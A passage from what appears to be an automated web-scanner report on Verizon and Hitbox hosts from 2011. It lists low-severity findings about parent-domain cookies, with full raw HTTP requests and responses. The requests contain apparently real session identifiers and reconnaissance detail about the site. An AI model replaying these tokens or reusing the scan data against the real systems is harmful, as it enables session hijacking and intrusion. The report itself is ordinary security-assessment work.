Set-Cookie: AkaSTrackingID=9D33249FECAD5AA85EEBAA50ED9C9B53; path=/; domain=verizon.net

...[SNIP]...

14.13. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507CPCF62EN3&cd=1&hv=6&n=/routing+page&con=&vcon=/vz/home/residential&tt=auto&ja=y&dt=22&zo=300&lm=1315278819000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0200u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=vzw_home,vzw_home,res_home,res_home,bus_home,bus_home,corp_vz,corp_vzw,hp_res_footer_about_us,hp_res_footer_contact_us,hp_res_footer_store_locator,hp_res_footer_careers,hp_bus_footer_vzthinkfinity,hp_res_footer_sitemap,hp_res_footer_privacy_policy,hp_res_footer_terms_conditions,hp_res_footer_site_feedback,&lv.pos=,,,,,,,,,,,,,,,,,&hid=0.22088988668371046 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: CTG=1315260820; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:40 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:13:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.14. http://ehg-verizon.hitbox.com/HGct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM550928B8DM%3BDM560507CPCF62EN3&cd=1&hv=6&n=/routing+page&con=&vcon=/vz/home/residential&tt=auto&ja=y&dt=22&zo=300&lm=1315278819000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0200u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=vzw_home,vzw_home,res_home,res_home,bus_home,bus_home,corp_vz,corp_vzw,hp_res_footer_about_us,hp_res_footer_contact_us,hp_res_footer_store_locator,hp_res_footer_careers,hp_bus_footer_vzthinkfinity,hp_res_footer_sitemap,hp_res_footer_privacy_policy,hp_res_footer_terms_conditions,hp_res_footer_site_feedback,&lv.pos=,,,,,,,,,,,,,,,,,&hid=0.22088988668371046 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: CTG=1315260819

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:41 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBeriBrrir%@iz%zrz%"%X%QBeriBrz%X%QBeriBr"%X%QBeriB%"%X%QBeriBrrir%@i"%z(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6QCzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:41 GMT; max-age=31536000
Set-Cookie: CTG=1315260821; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:41 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:13:42 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.15. https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1474
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:11 GMT
ETag: "5c2-4e228ad3"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89aQ...............mm............!..NETSCAPE2.0.....!..    ....,....Q....fh...0.I..8...-`(.Di.........:b].......;..a..aB...[..%Z..m2....8.is..w.F......e...h...f.d8^...........    .!.......,....Q....mx
...[SNIP]...

14.16. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/global/gHome.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/global/gHome.do HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0


14.17. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/selfreg/javascript/selfreg.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/javascript/selfreg.js HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: application/x-javascript
Last-Modified: Sun, 17 Jul 2011 07:10:54 GMT
ETag: W/"20e6-4e228afe"
Vary: accept-encoding
Cache-Control: private, max-age=28800
Date: Mon, 05 Sep 2011 22:22:43 GMT
Content-Length: 8422
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

function change(id, newClass)
{
       var theElement = document.getElementById(id);
       theElement.className = newClass;
}

function checkUserID()
{
       var userID = document.getElementById('userID');
       //a
...[SNIP]...

14.18. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do HTTP/1.1
Host: enterprisecenter.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fselfreg%2fsubmitEnrollmentProfileInfo%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:35:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT
Content-Length: 0


14.19. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1145
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "479-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

...[SNIP]...

14.20. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 841
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "349-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

...[SNIP]...

14.21. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 2234
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
